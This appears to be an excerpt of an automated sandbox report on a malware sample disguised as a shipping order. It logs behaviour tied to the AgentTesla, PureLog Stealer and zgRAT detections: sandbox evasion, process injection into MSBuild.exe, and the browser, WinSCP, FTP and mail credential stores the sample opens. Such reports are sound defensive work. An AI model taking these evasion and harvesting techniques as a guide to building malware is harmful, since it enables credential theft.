                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -94718s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 5888Thread sleep time: -94609s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 99890Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 99781Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 99672Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 99562Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 99453Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 99344Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 99234Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 99125Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 99015Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 98893Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 98781Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 98672Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 98562Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 98453Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 98344Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 98234Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 98125Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 98015Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 97906Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 97797Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 97687Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 97578Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 99219Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 99109Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 99000Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 98890Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 98016Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 97891Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 97766Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 97656Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeThread delayed: delay time: 97547Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 100000Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99875Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99765Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99655Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99546Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99437Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99328Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99218Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 99109Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98999Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98890Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98781Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98669Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98546Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98437Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98328Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98218Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 98109Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97999Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97890Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97781Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97671Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97562Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97453Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97343Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97234Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97125Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 97015Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96906Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96796Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96687Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96578Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96468Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96359Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96250Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96140Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 96031Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95921Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95812Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95703Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95593Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95484Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95375Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95265Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95156Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 95046Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94937Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94828Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94718Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 94609Jump to behavior
                        Source: Amcache.hve.4.drBinary or memory string: VMware
                        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                        Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                        Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                        Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: ShippingOrder_ GSHS2400052.exe, 00000000.00000002.1872818138.0000000001367000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000001.00000002.4124323381.0000000005D30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                        Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                        Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                        Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Allocates memory in foreign processes
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
                        Writes to foreign memory regions
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43C000Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43E000Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 828008Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeQueries volume information: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\ShippingOrder_ GSHS2400052.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

                        Stealing of Sensitive Information

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13047ee8.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13047ee8.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.4105077153.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.4097776387.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.4105077153.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2011142361.0000000013AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2011142361.0000000013031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2011142361.0000000013382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: ShippingOrder_ GSHS2400052.exe PID: 6424, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6816, type: MEMORYSTR
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13011a78.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.1b960000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.1b960000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13011a78.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2011142361.0000000013011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2043218281.000000001B960000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2011142361.0000000013031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Yara detected zgRAT
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13011a78.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.1b960000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.1b960000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13011a78.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2043218281.000000001B960000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13047ee8.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13047ee8.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.4105077153.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.4097776387.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2011142361.0000000013AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2011142361.0000000013031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2011142361.0000000013382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: ShippingOrder_ GSHS2400052.exe PID: 6424, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6816, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 1.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13aa18a8.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13047ee8.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13047ee8.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.4105077153.0000000002B51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.4097776387.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.4105077153.0000000002B7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2011142361.0000000013AA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2011142361.0000000013031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2011142361.0000000013382000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: ShippingOrder_ GSHS2400052.exe PID: 6424, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6816, type: MEMORYSTR
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13011a78.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.1b960000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.1b960000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13011a78.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.ShippingOrder_ GSHS2400052.exe.13031ab0.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2011142361.0000000013011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2043218281.000000001B960000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2011142361.0000000013031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Yara detected zgRAT
